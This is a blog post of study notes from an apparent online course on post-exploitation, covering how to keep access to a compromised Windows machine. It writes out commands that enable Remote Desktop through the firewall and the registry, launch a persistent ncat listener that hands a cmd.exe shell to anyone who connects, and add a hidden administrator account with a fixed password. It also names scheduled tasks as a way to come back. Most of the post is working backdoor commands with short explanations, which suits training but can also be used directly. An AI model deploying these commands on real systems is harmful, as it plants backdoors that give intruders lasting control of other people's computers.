Post Exploitation: Persistence and Backdoor

Course:  Joe Perry on “Post Exploitation Hacking” at Cybrary
I. Remote Desktop Protocol – RDP
*Windows native RDP
*Chrome RDP (or any other third-party RDP)

Setting up the Windows Firewall
Netsh advfirewall firewall set rule group=“remote desktop” new enable=Yes

•Netsh – network administration tool
•Advfirewall – identifies that you’re working with the windows “advanced” firewall
•Firewall – specifies that this is an actual firewall operation, not something else governed by advfirewall
•Set rule group=“remote desktop” – assigning a value to that specific group
•Enable=Yes – allow rdp connections

Editing the registry key
Reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

•Reg add – editing a registry to put something new into it
•“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” – the actual key we’re going to be messing with.
•/v fDenyTSConnections – the field (“Value”) we’re putting in
•/t REG_DWORD – the data type (Int/DWORD/string/etc)
•/d 0 – the actual value correspondent to the field label
•/f – force

II. Ncat Backdoor
ncat –lkp 51000 –e “cmd.exe”

•Lkp – listen persistently on port 51000
•-e “cmd.exe” – when you receive a connection, execute this command and take control of the IO pipes

III. New User
net user /add Acct4 ThisPassW0rd
net localgroup Administrators /add Acct4

IV. Scheduled arrival
Schtasks
At 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s